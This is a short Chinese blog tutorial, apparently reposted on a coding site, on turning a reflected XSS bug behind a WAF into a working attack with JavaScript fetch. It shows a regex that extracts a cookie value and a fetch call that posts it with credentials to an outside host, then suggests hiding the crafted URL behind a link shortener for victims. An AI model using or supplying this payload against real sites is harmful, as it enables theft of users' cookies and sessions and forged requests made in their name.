xss利用之fetch

栏目: 编程工具 · 发布时间: 6年前

内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,

偶然间发现某站有个漏洞

因为有WAF不好利用,我之前是不知道能咋利用,

然后大佬说能XSS利用,叫我写个fetch利用,

我?????

试着去学fetch这个东西了

于是有了此文

正文

首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545

大致理解了

然后发出一个fetch的post请求

也就是这个样子

fetch("http://192.168.199.141:3000/api/user/",{
  method:'POST',
  headers:{
     'Content-Type': 'application/json'
  },
  body:JSON.stringify({
    name:'john',
    pass:'xioayuan'
  })
})
.then((response)=>response.json())
.then((responseJsonData)=>{
  alert("请求成功");
  console.log(responseJsonData);
})
.catch((error)=>{
  alert(error);
})

如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点

假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如

document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')

这样就能提取到key的值了

上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS

var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1');
fetch('https://api.xxxx.com/add', {
method: "POST",
mode: "cors",
credentials: 'include',
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: form
});

直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。

这样一个反射XSS的利用还是蛮有意思的。


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

灵活Web设计

灵活Web设计

Zoe Mickley Gillenwater / 李静 / 2009-9 / 45.00元

《灵活Web设计》讲述如何应用可变或不固定布局及弹性布局来实现灵活设计,以满足用户的根据自己需求而调整浏览站点的窗口大小的要求。全书共分为9章,内容包括:理解灵活布局、可变布局和弹性布局存在的挑战、设计灵活布局的方法、准备网页设计、创建可变布局结构、创建弹性布局结构、规范灵活性、设置文字间距、添加背景图像和颜色、创建灵活的图像。 《灵活Web设计》适用于网页设计人员、网页设计爱好者。一起来看看 《灵活Web设计》 这本书的介绍吧!

MD5 加密
MD5 加密

MD5 加密工具

SHA 加密
SHA 加密

SHA 加密工具

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试